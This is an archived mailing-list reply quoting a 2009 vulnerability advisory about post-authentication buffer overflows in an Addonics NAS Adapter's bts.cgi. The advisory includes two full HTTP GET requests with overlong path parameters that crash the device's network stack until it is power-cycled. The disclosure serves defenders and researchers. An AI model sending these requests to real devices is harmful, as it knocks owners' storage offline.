Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth
Have any of these buffer overflows been debugged and/or proven
exploitable? Is debugging practical on this device? More details may
suffice the mind.
On Mon, Apr 20, 2009 at 4:12 PM, <mcyr2@csc.com> wrote:
> Remote: Yes
> Local: No
> Credit: Mike Cyr, aka h00die
> Vulnerable: NASU2FW41 Loader 1.17
> Not Vulnerable:
>
> Discussion:
>
> Addonics NAS Adapter Post-Auth DoS
>
> Addonics NAS Adapter is prone to several post authentication buffer overf=
lows. Each of these buffer overflows will crash the entire TCP/IP stack and=
the device will have to be power cycled to restore any functionality. Addo=
nics currently has implemented GUI level (client side) controls for prevent=
ing long inputs, but by simply doing a direct HTTP GET request (the device =
doesn't use POST) this can be bypassed.
>
> Addonics was notified of the buffer overflows via ticket 497283 on March =
25, 2009. =A0Vendor acknowledgment on March 26, 2009.
>
> Exploiting these issues will crash the network stack and create a Denial =
of Service condition.
>
> Firmware NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
>
> Exploit:
>
> http://www.milw0rm.com/exploits/8490
>
> Attackers can use a browser to exploit these issues.
>
> The following GET requests will result in the TCP/IP stack crashing and t=
he device requiring a reboot
>
> 1. Bittorrent: Download Path
>
> http://<ip>/bts.cgi?redirect=3Dbt.htm&failure=3Dfail.htm&type=3Dbt_search=
_apply&torrent_path=3D&download_path=3Daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>
> 2. Bittorent: torrent path
>
> http://<ip>/bts.cgi?redirect=3Dbt.htm&failure=3Dfail.htm&type=3Dbt_search=
_apply&torrent_path=3Daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
aaaaaaaaaaaaaaaaaa&download_path=3DPUBLIC
>
>
>
> References:
>
> Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp
>